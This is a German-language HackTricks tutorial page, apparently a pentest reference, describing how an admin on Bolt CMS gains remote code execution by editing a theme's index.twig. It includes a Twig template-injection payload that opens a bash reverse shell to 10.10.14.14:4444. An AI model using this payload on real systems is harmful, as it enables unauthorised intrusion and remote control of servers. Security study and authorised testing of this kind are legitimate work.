Bolt CMS

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

RCE

Nach dem Login als Admin (gehen Sie zu /bot, um die Anmeldemaske zu erreichen), können Sie RCE in Bolt CMS erhalten:

• Wählen Sie Configuration -> View Configuration -> Main Configuration oder gehen Sie zum URL-Pfad /bolt/file-edit/config?file=/bolt/config.yaml
• Überprüfen Sie den Wert des Themas

• Wählen Sie File management -> View & edit templates
• Wählen Sie das im vorherigen Schritt gefundene Basis-Thema (base-2021 in diesem Fall) und wählen Sie index.twig
• In meinem Fall befindet sich dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
• Setzen Sie Ihre Payload in diese Datei über template injection (Twig), wie: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• Und speichern Sie die Änderungen

• Leeren Sie den Cache in Maintenance -> Clear the cache
• Greifen Sie erneut als regulärer Benutzer auf die Seite zu, und die Payload sollte ausgeführt werden

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.